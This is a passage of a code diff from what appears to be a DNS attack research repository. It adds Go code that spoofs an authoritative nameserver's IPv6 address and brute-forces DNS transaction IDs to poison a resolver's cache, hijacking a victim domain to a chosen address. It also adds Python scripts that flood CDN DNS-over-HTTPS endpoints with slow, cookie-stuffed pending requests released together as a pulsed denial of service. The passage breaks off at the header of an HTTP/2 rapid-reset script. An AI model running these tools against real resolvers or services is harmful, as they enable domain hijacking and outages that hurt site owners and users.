 		msg.SetQuestion(domain, dns.TypeAAAA)
 		_, _, _ = c.Exchange(msg, net.JoinHostPort(resolverBackendIPArg.String(), "53"))
 		return
 	}
 	rand.Seed(time.Now().UnixNano())
 	handle, _ = pcap.OpenLive(
 		ifaceName,
 		65536,
 		true,
 		pcap.BlockForever,
 	)
 	println(authIPArg.To16().String())
 	err := handle.SetBPFFilter("not host " + authIPArg.To16().String())
 	if err != nil {
 		fmt.Println("cannot set BPF filter.")
 	}
 	iface, err := net.InterfaceByName(ifaceName)
 	if err != nil {
 		fmt.Println("cannot open network interface")
 		os.Exit(1)
 	}
 	if attackerMaliciousDomainArg != "" {
 		attackForwarder = true
 		fmt.Println("Forwarder Attack Mode!")
 		attackerControlledDomain = attackerMaliciousDomainArg
 	}
 	authIP = authIPArg
 	resolverIP = resolverIPArg
 	victimDNSName = victimDNSNameArg
 	debugOutput = debugOutputArg
 	timeGap = timeGapArg
 	soaName = soaNameArg
 	localIP, _ = GetIfaceAddrMulti(iface)
 	nonce := strconv.Itoa(rand.Int())
 	if !attackForwarder {
 		dnsQueryName = nonce + "." + victimDNSName
 	} else {
 		dnsQueryName = nonce + "." + attackerControlledDomain
 	}
 	defaultJitter = defaultJitterArg
 	repeatTimes = int(repeatTimesArg)
 	if resolverBackendList != "" {
 		file, err := os.Open(resolverBackendList)
 		if err != nil {
 			fmt.Println(err)
 			os.Exit(10)
 		}
 		for {
 			var resolverIP string
 			n, err := fmt.Fscanf(file, "%s", &resolverIP)
 			if n <= 0 || err != nil {
 				break
 			}
 			backendResolvers = append(backendResolvers, backendResolverBuilder(net.ParseIP(resolverIP)))
 		}
 	} else {
 		//r1 shouldn't be nil
 		r1 := backendResolverBuilder(resolverBackendIPArg)
 		backendResolvers = append(backendResolvers, r1)
 	}
 	//figure out MAC address
 	//test if it's in LAN first
 	dstMac, err := GetGatewayAddr(iface, handle, backendResolvers[0].resolverBackendIP.To16())
 	if err == nil {
 		ethernetLayer = &layers.Ethernet{
 			SrcMAC: iface.HardwareAddr,
 			DstMAC: dstMac,
 			//EthernetType: layers.EthernetTypeIPv4,
 			EthernetType: layers.EthernetTypeIPv6,
 		}
 		fmt.Println("Mac:", dstMac)
 	} else {
 		//query routing table
 		router, err := routing.New()
 		if err != nil {
 			fmt.Println(err)
 			os.Exit(4)
 		}
 		_, nextHopIP, _, err := router.Route(backendResolvers[0].resolverBackendIP)
 		if err != nil {
 			fmt.Println(err)
 			os.Exit(5)
 		}
 		dstMac, err := GetGatewayAddr(iface, handle, nextHopIP.To16())
 		if err != nil {
 			fmt.Println(err)
 			os.Exit(6)
 		}
 		fmt.Println("MAC:", dstMac)
 		ethernetLayer = &layers.Ethernet{
 			SrcMAC: iface.HardwareAddr,
 			DstMAC: dstMac,
 			//EthernetType: layers.EthernetTypeIPv4,
 			EthernetType: layers.EthernetTypeIPv6,
 		}
 	}
 	go receivingThread()
 	for i, ip := range localIP {
 		if debugOutput {
 			fmt.Println("use IP", ip)
 		}
 		for _, r := range backendResolvers {
 			go perIPLimitRecover(r, i)
 		}
 	}
 	go dnsRequestSender(dnsQueryTimeout)
 	for _, r := range backendResolvers {
 		go probeSender(r)
 		go portGroupFormer(r, startPort, endPort)
 		time.Sleep(25 * time.Millisecond)
 	}
 	time.Sleep(999 * time.Hour)
 }
 func allocateGroupID(r *backendResolver) uint32 {
 	r.groupIDCounterLock.Lock()
 	id := r.groupIDCounter
 	r.groupIDCounter++
 	if r.groupIDCounter == 0 {
 		r.groupIDCounter = 3
 	}
 	r.groupIDCounterLock.Unlock()
 	return id
 }
 func getBackendResolver(resolverIP net.IP) *backendResolver {
 	for _, r := range backendResolvers {
 		if compareIPv6Addr(r.resolverBackendIP, resolverIP) == 0 {
 			return r
 		}
 	}
 	return nil
 }
 func lockNetwork() {
 	for _, r := range backendResolvers {
 		r.networkXmitLock.Lock()
 	}
 }
 func unlockNetwork() {
 	for _, r := range backendResolvers {
 		r.networkXmitLock.Unlock()
 	}
 }
 func getLocalIPNum(ip net.IP) int {
 	for i, localip := range localIP {
 		if compareIPv6Addr(localip, ip) == 0 {
 			return i
 		}
 	}
 	return -1
 }
 func backendResolverBuilder(backendIP net.IP) *backendResolver {
 	if backendIP == nil {
 		return nil
 	}
 	temp := backendResolver{
 		resolverBackendIP:    backendIP,
 		groups:               make([][]uint16, 65536),
 		groupIDCounter:       3,
 		groupIDCounterLock:   &sync.Mutex{},
 		groupSendTime:        make([]time.Time, 65536),
 		probeChannel:         make(chan uint32, 655),
 		priorityProbeChannel: make(chan uint32, 655),
 		alwaysOpenPorts:      make([]bool, 65536),
 		perIPLimitCounter:    make([]int, len(localIP)),
 		networkXmitLock:      &sync.Mutex{},
 	}
 	for i := range temp.perIPLimitCounter {
 		temp.perIPLimitCounter[i] = 6
 	}
 	for i := 0; i < 65536; i++ {
 		temp.alwaysOpenPorts[i] = false
 	}
 	temp.alwaysOpenPorts[53] = true
 	temp.alwaysOpenPorts[0] = true
 	temp.alwaysOpenPorts[65535] = true
 	return &temp
 }
 // distribute verification to multiple IPs evenly
 func getIPwithAvailableCounter(r *backendResolver) net.IP {
 	seed := rand.Int() % len(localIP)
 	for i := 0; i < len(localIP); i++ {
 		if r.perIPLimitCounter[(i+seed)%len(localIP)] > 0 {
 			return localIP[(i+seed)%len(localIP)]
 		}
 	}
 	return nil
 }
--- a/5_v6_fake/src/ucr.edu/fakedns6/dns.go
+++ b/5_v6_fake/src/ucr.edu/fakedns6/dns.go
@@ -0,0 +1,332 @@
 package main
 import (
 	"fmt"
 	"github.com/google/gopacket/layers"
 	"math/rand"
 	"net"
 	"time"
 )
 var bruteForceCouldBeKilled bool
 func sendDNSRequest(id uint16, name string) {
 	if debugOutput {
 		fmt.Println("Send new DNS request", name, id)
 	}
 	_sendDNSRequest(id, name, localIP[0], resolverIP, (layers.UDPPort)(rand.Uint32()), 53)
 }
 func _sendDNSRequest(id uint16, name string, src net.IP, dst net.IP, sport layers.UDPPort, dport layers.UDPPort) {
 	ipLayer := layers.IPv6{
 		FlowLabel:  1,
 		SrcIP:      src,
 		DstIP:      dst,
 		Version:    6,
 		HopLimit:   64,
 		NextHeader: layers.IPProtocolUDP,
 		//Flags:      layers.IPv4DontFragment,
 	}
 	udpLayer := layers.UDP{
 		SrcPort: sport,
 		DstPort: dport,
 	}
 	dnsLayer := layers.DNS{
 		ID:           id,
 		QR:           false,
 		OpCode:       0,
 		AA:           false,
 		TC:           false,
 		RD:           true,
 		RA:           false,
 		Z:            0,
 		ResponseCode: 0,
 		QDCount:      1,
 		ANCount:      0,
 		NSCount:      0,
 		ARCount:      0,
 		Questions: []layers.DNSQuestion{{
 			Name:  []byte(name),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 		}},
 		Authorities: nil,
 		Additionals: nil,
 	}
 	err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
 	if err != nil {
 		fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go pos 0 error", err)
 	}
 	err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
 	if err != nil {
 		fmt.Println("can not send packet @ sendDNSRequest: ", err)
 	}
 }
 func bruteForceTerminatingTimer(timegap uint) {
 	time.Sleep(time.Duration(timegap) * time.Millisecond)
 	bruteForceCouldBeKilled = true
 }
 func dnsBruteForce(targetPort uint16, timegap uint, resolverBackendIP net.IP, auxDomain string) {
 	bruteForceShouldBeKilled = true
 	bruteForceCouldBeKilled = false
 	ipLayer := layers.IPv6{
 		FlowLabel:  2,
 		SrcIP:      authIP,
 		DstIP:      resolverBackendIP,
 		Version:    6,
 		HopLimit:   64,
 		NextHeader: layers.IPProtocolUDP,
 		//Flags:    layers.IPv4DontFragment,
 	}
 	udpLayer := layers.UDP{
 		SrcPort: 53,
 		DstPort: layers.UDPPort(targetPort),
 	}
 	dnsLayer := layers.DNS{
 		ID:           0,
 		QR:           true,
 		OpCode:       0,
 		AA:           true,
 		TC:           false,
 		RD:           false,
 		RA:           false,
 		Z:            0,
 		ResponseCode: layers.DNSResponseCodeNoErr,
 		/* Answers for A request for ns.a.com */
 		//Questions: []layers.DNSQuestion{{
 		//	Name:  []byte(victimAuthName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//}},
 		//Answers: []layers.DNSResourceRecord{{
 		//	Name:  []byte(victimAuthName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//	TTL:   300,
 		//	IP:    net.ParseIP(""),
 		//	CNAME: nil,
 		//	PTR:   nil,
 		//	TXTs:  nil,
 		//	SOA:   layers.DNSSOA{},
 		//	SRV:   layers.DNSSRV{},
 		//	MX:    layers.DNSMX{},
 		//	OPT:   nil,
 		//	TXT:   nil,
 		//}},
 		//Authorities: nil,
 		//Additionals: nil,
 		/* Answers for A request for www.a.com */
 		//Questions: []layers.DNSQuestion{{
 		//	Name:  []byte(victimDNSName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//}},
 		//Answers: []layers.DNSResourceRecord{{
 		//	Name:  []byte(victimDNSName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//	TTL:   300,
 		//	IP:    net.ParseIP(""),
 		//	CNAME: nil,
 		//	PTR:   nil,
 		//	TXTs:  nil,
 		//	SOA:   layers.DNSSOA{},
 		//	SRV:   layers.DNSSRV{},
 		//	MX:    layers.DNSMX{},
 		//	OPT:   nil,
 		//	TXT:   nil,
 		//}},
 		//Authorities: nil,
 		//Additionals: nil,
 		/* Answers for A request for ***.www.a.com */
 		//Questions: []layers.DNSQuestion{{
 		//	Name:  []byte(dnsQueryName),
 		//	Type:  layers.DNSTypeA,
 		//	Class: layers.DNSClassIN,
 		//}},
 		//Authorities: []layers.DNSResourceRecord{{
 		//	Name:  []byte(victimDNSName),
 		//	Type:  layers.DNSTypeNS,
 		//	Class: layers.DNSClassIN,
 		//	TTL:   300,
 		//	IP:    nil,
 		//	NS:    []byte(auxDomain),
 		//	CNAME: nil,
 		//	PTR:   nil,
 		//	TXTs:  nil,
 		//	SOA:   layers.DNSSOA{},
 		//	SRV:   layers.DNSSRV{},
 		//	MX:    layers.DNSMX{},
 		//	OPT:   nil,
 		//	TXT:   nil,
 		//}},
 		//Answers:     nil,
 		//Additionals: nil,
 	}
 	if !attackForwarder {
 		dnsLayer.Questions = []layers.DNSQuestion{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 		}}
 		// 原方案：将域名NS篡改到attacker的服务器上
 		//dnsLayer.Authorities = []layers.DNSResourceRecord{{
 		//	Name:  []byte(victimDNSName),
 		//	Type:  layers.DNSTypeNS,
 		//	Class: layers.DNSClassIN,
 		//	TTL:   300,
 		//	IP:    nil,
 		//	NS:    []byte(auxDomain),
 		//	CNAME: nil,
 		//	PTR:   nil,
 		//	TXTs:  nil,
 		//	SOA:   layers.DNSSOA{},
 		//	SRV:   layers.DNSSRV{},
 		//	MX:    layers.DNSMX{},
 		//	OPT:   nil,
 		//	TXT:   nil,
 		//}}
 		//dnsLayer.Answers = nil
 		//dnsLayer.Additionals = nil
 		dnsLayer.Authorities = []layers.DNSResourceRecord{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeNS,
 			Class: layers.DNSClassIN,
 			TTL:   300,
 			IP:    nil,
 			NS:    []byte(auxDomain),
 			CNAME: nil,
 			PTR:   nil,
 			TXTs:  nil,
 			SOA:   layers.DNSSOA{},
 			SRV:   layers.DNSSRV{},
 			MX:    layers.DNSMX{},
 			OPT:   nil,
 			TXT:   nil,
 		}}
 		dnsLayer.Answers = []layers.DNSResourceRecord{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 			TTL:   300,
 			/* Fill with any IP you want. The victim domain will be hijacked to this IP. */
 			IP:    net.ParseIP("2001::1234"),
 			NS:    nil,
 			CNAME: nil,
 			PTR:   nil,
 			TXTs:  nil,
 			SOA:   layers.DNSSOA{},
 			SRV:   layers.DNSSRV{},
 			MX:    layers.DNSMX{},
 			OPT:   nil,
 			TXT:   nil,
 		}}
 		dnsLayer.Additionals = nil
 	} else {
 		/* Change these flags accordingly to the request sent by the resolver. */
 		dnsLayer.AA = false
 		dnsLayer.RD = true
 		dnsLayer.RA = true
 		dnsLayer.Questions = []layers.DNSQuestion{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 		}}
 		dnsLayer.Answers = []layers.DNSResourceRecord{{
 			Name:  []byte(dnsQueryName),
 			Type:  layers.DNSTypeCNAME,
 			Class: layers.DNSClassIN,
 			TTL:   300,
 			IP:    nil,
 			NS:    nil,
 			CNAME: []byte(victimDNSName),
 			PTR:   nil,
 			TXTs:  nil,
 			SOA:   layers.DNSSOA{},
 			SRV:   layers.DNSSRV{},
 			MX:    layers.DNSMX{},
 			OPT:   nil,
 			TXT:   nil,
 		}, {
 			Name:  []byte(victimDNSName),
 			Type:  layers.DNSTypeAAAA,
 			Class: layers.DNSClassIN,
 			TTL:   300,
 			/* Fill with any IP you want. The victim domain will be hijacked to this IP. */
 			IP:    net.ParseIP("2001::1234"),
 			NS:    nil,
 			CNAME: nil,
 			PTR:   nil,
 			TXTs:  nil,
 			SOA:   layers.DNSSOA{},
 			SRV:   layers.DNSSRV{},
 			MX:    layers.DNSMX{},
 			OPT:   nil,
 			TXT:   nil,
 		}}
 	}
 	err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
 	if err != nil {
 		fmt.Println("udpLayer.SetNetworkLayerForChecksum @ dns.go error", err)
 	}
 	if debugOutput {
 		fmt.Println("DNS BruteForce: ", targetPort)
 	}
 	startTime := time.Now()
 	var txid uint16
 	//try to see if this port is open in reality
 	for txid = 0; txid < GROUP_SIZE*2; txid++ {
 		dnsLayer.ID = txid
 		err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
 		if err != nil {
 			fmt.Println("can not send packet @ sendDNSRequest pos 1: ", err)
 		}
 		time.Sleep(time.Duration(timegap) * time.Microsecond)
 	}
 	/* This is used for early termination */
 	//verification packet
 	//xmitUDPv6(localIP, resolverBackendIP, layers.UDPPort(targetPort), 65535, 2, 0)
 	//go bruteForceTerminatingTimer( /*jitter + defaultJitter*/ defaultJitter + 60)
 	//continue brute force
 	for txid = GROUP_SIZE * 2; txid < 0xffff; txid++ {
 		/* This is used for early termination */
 		//if bruteForceCouldBeKilled && bruteForceShouldBeKilled {
 		//	fmt.Println("DNS Brute force aborted")
 		//	break
 		//}
 		dnsLayer.ID = txid
 		err := Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
 		if err != nil {
 			fmt.Println("can not send packet @ DNSBruteForce: ", err)
 		}
 		if timegap != 0 {
 			time.Sleep(time.Duration(timegap) * time.Microsecond)
 		}
 	}
 	//0xffff is missing from packet trace
 	/* This is used for early termination */
 	//if !bruteForceShouldBeKilled {
 	dnsLayer.ID = 0xffff
 	err = Send(handle, ethernetLayer, &ipLayer, &udpLayer, &dnsLayer)
 	if err != nil {
 		fmt.Println("can not send packet @ DNSBruteForce pos 2: ", err)
 	}
 	//}
 	if debugOutput {
 		fmt.Println("time: ", time.Now().Sub(startTime))
 	}
 	//help to recover the global counter
 	time.Sleep(time.Duration(60+ /*jitter + defaultJitter*/ defaultJitter) * time.Millisecond)
 }
--- a/5_v6_fake/src/ucr.edu/fakedns6/go.mod
+++ b/5_v6_fake/src/ucr.edu/fakedns6/go.mod
@@ -0,0 +1,15 @@
 module fakedns6
 go 1.20
 require (
 	github.com/google/gopacket v1.1.19
 	github.com/miekg/dns v1.1.57
 )
 require (
 	golang.org/x/mod v0.12.0 // indirect
 	golang.org/x/net v0.17.0 // indirect
 	golang.org/x/sys v0.13.0 // indirect
 	golang.org/x/tools v0.13.0 // indirect
 )
--- a/5_v6_fake/src/ucr.edu/fakedns6/go.sum
+++ b/5_v6_fake/src/ucr.edu/fakedns6/go.sum
@@ -0,0 +1,25 @@
 github.com/google/gopacket v1.1.19 h1:ves8RnFZPGiFnTS0uPQStjwru6uO6h+nlr9j6fL7kF8=
 github.com/google/gopacket v1.1.19/go.mod h1:iJ8V8n6KS+z2U1A8pUwu8bW5SyEMkXJB8Yo/Vo+TKTo=
 github.com/miekg/dns v1.1.57 h1:Jzi7ApEIzwEPLHWRcafCN9LZSBbqQpxjt/wpgvg7wcM=
 github.com/miekg/dns v1.1.57/go.mod h1:uqRjCRUuEAA6qsOiJvDd+CFo/vW+y5WR6SNmHE55hZk=
 golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
 golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
 golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY=
 golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg=
 golang.org/x/mod v0.12.0 h1:rmsUpXtvNzj340zd98LZ4KntptpfRHwpFOHG188oHXc=
 golang.org/x/mod v0.12.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs=
 golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
 golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
 golang.org/x/net v0.17.0 h1:pVaXccu2ozPjCXewfr1S7xza/zcXTity9cCdXQYSjIM=
 golang.org/x/net v0.17.0/go.mod h1:NxSsAGuq816PNPmqtQdLE42eU2Fs7NoRIZrHJAlaCOE=
 golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.4.0 h1:zxkM55ReGkDlKSM+Fu41A+zmbZuaPVbGMzvvdUPznYQ=
 golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
 golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.13.0 h1:Af8nKPmuFypiUBjVoU9V20FiaFXOcuZI21p0ycVYYGE=
 golang.org/x/sys v0.13.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
 golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapKDTa4BR/hXlZSLoq2Wpct/0txZ28=
 golang.org/x/tools v0.13.0 h1:Iey4qkscZuv0VvIt8E0neZjtPVQFSc870HQ448QgEmQ=
 golang.org/x/tools v0.13.0/go.mod h1:HvlwmtVNQAhOuCjW7xxvovg8wbNq7LwfXh/k7wXUl58=
 golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
--- a/5_v6_fake/src/ucr.edu/fakedns6/library.go
+++ b/5_v6_fake/src/ucr.edu/fakedns6/library.go
@@ -0,0 +1,171 @@
 package main
 import (
 	"encoding/binary"
 	"errors"
 	"fmt"
 	"github.com/google/gopacket"
 	"github.com/google/gopacket/layers"
 	"github.com/google/gopacket/pcap"
 	"net"
 	"time"
 )
 func GetIfaceAddrMulti(iface *net.Interface) ([]net.IP, error) {
 	addrs, err := iface.Addrs()
 	if err != nil {
 		return nil, errors.New("can not get ip address")
 	}
 	var srcIP []net.IP
 	for _, address := range addrs {
 		if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
 			if ipnet.IP.To16() != nil {
 				//check repeat
 				okToAdd := true
 				for _, temp := range srcIP {
 					if compareIPv6Addr(temp, ipnet.IP.To16()) == 0 {
 						okToAdd = false
 						break
 					}
 				}
 				if okToAdd {
 					srcIP = append(srcIP, ipnet.IP.To16())
 				}
 			}
 		}
 	}
 	if srcIP == nil || len(srcIP) == 0 {
 		return nil, errors.New("can not get ip address")
 	}
 	return srcIP, nil
 }
 func Send(handle *pcap.Handle, l ...gopacket.SerializableLayer) error {
 	opts := gopacket.SerializeOptions{
 		FixLengths:       true,
 		ComputeChecksums: true,
 	}
 	buffer := gopacket.NewSerializeBuffer()
 	if err := gopacket.SerializeLayers(buffer, opts, l...); err != nil {
 		return err
 	}
 	return handle.WritePacketData(buffer.Bytes())
 }
 func GetIfaceAddr(iface *net.Interface) (net.IP, error) {
 	addrs, err := iface.Addrs()
 	if err != nil {
 		return nil, errors.New("can not get ip address")
 	}
 	var srcIP net.IP
 	for _, address := range addrs {
 		if ipnet, ok := address.(*net.IPNet); ok && !ipnet.IP.IsLoopback() {
 			if ipnet.IP.To16() != nil {
 				srcIP = ipnet.IP.To16()
 				break
 			}
 		}
 	}
 	if srcIP == nil {
 		return nil, errors.New("can not get ip address")
 	}
 	return srcIP, nil
 }
 func GetGatewayAddr(iface *net.Interface, handle *pcap.Handle, gatewayIP net.IP) (net.HardwareAddr, error) {
 	srcIP, err := GetIfaceAddr(iface)
 	if err != nil {
 		return nil, errors.New("can not get ip address")
 	}
 	start := time.Now()
 	// Prepare the layers to send for an ARP request.
 	eth := layers.Ethernet{
 		SrcMAC:       iface.HardwareAddr,
 		DstMAC:       net.HardwareAddr{0xff, 0xff, 0xff, 0xff, 0xff, 0xff},
 		EthernetType: layers.EthernetTypeARP,
 	}
 	arp := layers.ARP{
 		AddrType:          layers.LinkTypeEthernet,
 		Protocol:          layers.EthernetTypeIPv6,
 		HwAddressSize:     6,
 		ProtAddressSize:   4,
 		Operation:         layers.ARPRequest,
 		SourceHwAddress:   []byte(iface.HardwareAddr),
 		SourceProtAddress: []byte(srcIP),
 		DstHwAddress:      []byte{0, 0, 0, 0, 0, 0},
 		DstProtAddress:    []byte(gatewayIP),
 	}
 	// Send a single ARP request packet (we never retry a send, since this
 	// is just an example ;)
 	if err := Send(handle, &eth, &arp); err != nil {
 		return nil, err
 	}
 	// Wait 3 seconds for an ARP reply.
 	for {
 		if time.Since(start) > time.Second*3 {
 			return nil, errors.New("timeout getting ARP reply")
 		}
 		data, _, err := handle.ReadPacketData()
 		if err == pcap.NextErrorTimeoutExpired {
 			continue
 		} else if err != nil {
 			return nil, err
 		}
 		packet := gopacket.NewPacket(data, layers.LayerTypeEthernet, gopacket.NoCopy)
 		if arpLayer := packet.Layer(layers.LayerTypeARP); arpLayer != nil {
 			arp := arpLayer.(*layers.ARP)
 			if net.IP(arp.SourceProtAddress).Equal(gatewayIP) {
 				return arp.SourceHwAddress, nil
 			}
 		}
 	}
 }
 func compareIPv6Addr(ip0 net.IP, ip1 net.IP) int {
 	temp0 := binary.LittleEndian.Uint32(ip0.To16())
 	temp1 := binary.LittleEndian.Uint32(ip1.To16())
 	if temp0 == temp1 {
 		return 0
 	}
 	if temp0 > temp1 {
 		return 1
 	}
 	return -1
 }
 func xmitUDPv6(srcIP net.IP, dstIP net.IP, srcPort layers.UDPPort, dstPort layers.UDPPort, flowlabel uint32, timegap uint32) {
 	ipLayer := layers.IPv6{
 		FlowLabel:  flowlabel,
 		SrcIP:      srcIP,
 		DstIP:      dstIP,
 		Version:    6,
 		HopLimit:   64,
 		NextHeader: layers.IPProtocolUDP,
 	}
 	udpLayer := layers.UDP{
 		SrcPort: srcPort,
 		DstPort: dstPort,
 	}
 	err := udpLayer.SetNetworkLayerForChecksum(&ipLayer)
 	if err != nil {
 		fmt.Println("xmitUDPv6 can not SetNetworkLayerForChecksum", err)
 	}
 	err = Send(handle, ethernetLayer, &ipLayer, &udpLayer)
 	if err != nil {
 		fmt.Println("xmitUDPv6 can not send packet", err)
 	}
 	if timegap != 0 {
 		time.Sleep(time.Duration(timegap) * time.Microsecond)
 	}
 }
--- a/5_v6_fake/src/ucr.edu/fakedns6/saddns
+++ b/5_v6_fake/src/ucr.edu/fakedns6/saddns
--- a/5_v6_fake/txid.bin
+++ b/5_v6_fake/txid.bin
@@ -0,0 +1 @@
 fH
--- a/5_v6_fake/说明文档.docx
+++ b/5_v6_fake/说明文档.docx
--- a/6_dot_DDoS/att_pending_cookie.py
+++ b/6_dot_DDoS/att_pending_cookie.py
@@ -0,0 +1,127 @@
 import argparse
 import http.client
 import asyncio
 import base64
 import random
 import secrets
 import string
 from collections import Counter
 import sys
 import time
 import requests
 import dns.message
 import httpx
 import gzip
 import io
 import pandas as pd
 import tqdm
 from concurrent.futures import ThreadPoolExecutor
 import threading
 from dns.message import make_query
 def ge_cookie():
    cookie = ""
    for i in range(200):
        cookie += ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(4, 10)))+\
                  "="''.join(random.choice(string.ascii_letters + string.digits) for _ in range(random.randint(8, 20)))+"; "
    cookie = cookie[:-2]
    #print(sys.getsizeof(cookie)/1024)
    return cookie
 def send_request(event,url,t,latency,stime):
    cookie = ge_cookie()
    headers = {"content-type": "application/dns-message",
               "accept": "application/dns-message",
               "Surrogate-Control": "max-age=0", "Cache-Control": "max-age=0",
               "Cookie":cookie}
    message = dns.message.make_query(base64.b64encode(url.encode("utf-8")).decode("utf-8") +
                                     ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))+ ".google.com", "A")
    message.flags |= dns.flags.RD
    dns_req = base64.b64encode(message.to_wire()).decode("UTF8").rstrip("=")
    # time.sleep(t*2)
    conn = http.client.HTTPConnection(url, port=80)
    #time.sleep(3)
    body = ','.join([f'{name}: {value}' for name, value in headers.items()])
    request_line = "GET /dns-query?dns=" + f"{dns_req} HTTP/1.1\r\n"
    conn.send(request_line.encode())
    headers0 = {'host': 'www.doeresearch.site'}
    headers0 = ''.join([f'{name}: {value}\r\n' for name, value in headers0.items()])
    conn.send(headers0.encode())
    #time.sleep(10)
    #body = str(make_query(qname="baidu.com", rdtype="A", want_dnssec=False))
    #print(body)
    #print(len(body))
    chunk_size = 20 # 每个块的大小
    for i in range(0, len(body), chunk_size):
        #print(i,'------------------')
        chunk = body[i:i + chunk_size]
        conn.send(f'{chunk}'.encode())
        start_time = time.perf_counter()
        while time.perf_counter() - start_time < 0.002:
            pass
        # print('P')
    conn.send(b'\r\n')
    # 发送结束标志
    #print(url, t, 'pending')
    desired_time = latency / 2000  # 将毫秒转换为秒
    #conn.close()
    #time.sleep(10)
    event.wait()
    # start_time = time.perf_counter()
    # while time.perf_counter() - start_time < desired_time:
    #     pass
    #conn.send(b'0\r\n\r\n')
    conn.send(b'\r\n')
    # Get the response
    #response = conn.getresponse()
    # print(response.status, response.reason)
    #print(response.read())
    # print(dns.message.from_wire(response.read()))
    #conn.close()
 if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-stime', '--stime')
    parser.add_argument('-round', '--round',default=10)
    parser.add_argument('-wait', '--wait',default=180)
    args = parser.parse_args()
    path = '/root/Nora/cdn/'
    #path = 'D:\Volumes\调研\项目\YYDNS\GJ\DDOS/'
    df = pd.read_csv(path+'fastly_att.csv',nrows=64)
    data = df.set_index('ip')['latency'].to_dict()
    event = threading.Event()
    s_time = time.time()
    #stime = time.perf_counter()
    stime = float(args.stime)
    round = int(args.round)
    wait_time = int(args.wait)
    threads = []
    for i in range(round):
        for ip, latency in data.items():
            t = threading.Thread(target=send_request, args=(event,ip, i, latency,stime))
            t.start()
            threads.append(t)
            #time.sleep(latency)
        start_time = time.perf_counter()
        # while time.perf_counter() - start_time < 0.1:
        #     pass
    print('all waiting')
    while time.perf_counter() - stime < wait_time:
        pass
    # 触发事件，同时释放所有线程
    event.set()
    # 等待所有线程完成
    for t in threads:
        t.join()
    print('ATT over:',time.time() - s_time)
    #for i in tqdm.tqdm(range(1000)):
    #send_request("151.101.76.204",0,0,0)
--- a/6_dot_DDoS/start_pending.py
+++ b/6_dot_DDoS/start_pending.py
@@ -0,0 +1,20 @@
 import os
 import argparse
 import time
 parser = argparse.ArgumentParser()
 parser.add_argument('-n', '--n', default=3)
 parser.add_argument('-round', '--round', default=5)
 parser.add_argument('-wait', '--wait', default=150)
 args = parser.parse_args()
 stime = time.perf_counter()
 round = int(args.round)
 wait_time = int(args.wait)
 for i in range(int(args.n)):
    #print(f"python3 cve44487.py -s {i}")
    os.popen(f"python att_pending_cookie.py -stime {stime} -round {round} -wait {wait_time}")
 while True:
    current_time = time.perf_counter()
    elapsed_time = current_time - stime
    print(f"经过的时间：{elapsed_time:.2f}秒", end="\r")
    time.sleep(1)  # 暂停一秒钟
--- a/6_dot_DDoS/脉冲拒绝服务.pdf
+++ b/6_dot_DDoS/脉冲拒绝服务.pdf
--- a/7_doh_DDoS/HTTP2快速重置拒绝服务.pdf
+++ b/7_doh_DDoS/HTTP2快速重置拒绝服务.pdf
--- a/7_doh_DDoS/cve44487.py
+++ b/7_doh_DDoS/cve44487.py
@@ -0,0 +1,152 @@
 import random
 import ssl
 import string
 import sys
 import csv
 import socket
 import argparse
 import time
 import dns.message
 from datetime import datetime
 from urllib.parse import urlparse
 from http.client import HTTPConnection, HTTPSConnection
